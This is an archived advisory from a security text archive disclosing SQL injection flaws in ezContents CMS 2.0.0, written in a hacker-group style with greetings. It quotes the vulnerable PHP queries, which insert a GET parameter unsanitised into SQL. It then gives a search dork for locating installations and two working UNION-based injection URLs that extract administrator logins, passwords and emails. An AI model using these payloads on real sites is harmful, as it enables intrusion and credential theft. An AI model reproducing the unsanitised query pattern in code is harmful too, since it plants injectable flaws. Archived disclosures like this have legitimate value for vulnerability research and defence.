Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx3107.htm

ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities



ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities
ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities



            =0D
  #######################################################################################=0D
  #                                                                                     #=0D
  # ...:::::ezContents CMS Version 2.0.0  SQL Injection Vulnerabilities ::::...         #           =0D
  #######################################################################################=0D
=0D
Virangar Security Team=0D
=0D
www.virangar.net=0D 
=0D
--------=0D
Discoverd By :virangar security team(hadihadi)=0D
=0D
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra=0D
=0D
& all virangar members & all hackerz=0D
=0D
greetz:to my best friend in the world hadi_aryaie2004=0D
& my lovely friend arash(imm02tal) from emperor team :)=0D
-----=0D
d0rk:"ezContents CMS Version 2.0.0"=0D
-------vuln codes in:-----------=0D
showdetails.php:=0D
$strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname ='".$HTTP_GET_VARS["contentname"]."' AND language='".$GLOBALS["gsLanguage"]."'";=0D
*********=0D
printer.php:=0D
$strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname ='".$HTTP_GET_VARS["article"]."' AND language='".$GLOBALS["gsLanguage"]."'";=0D
---=0D
exploits:=0D
http://site.com/[patch]/showdetails.php?contentname='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(login,0x3a,userpassword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*=0D 
http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(login,0x3a,userpassword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*=0D 
---=0D
young iranian h4ck3rz=0D
=0D
=0D
=0D
=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH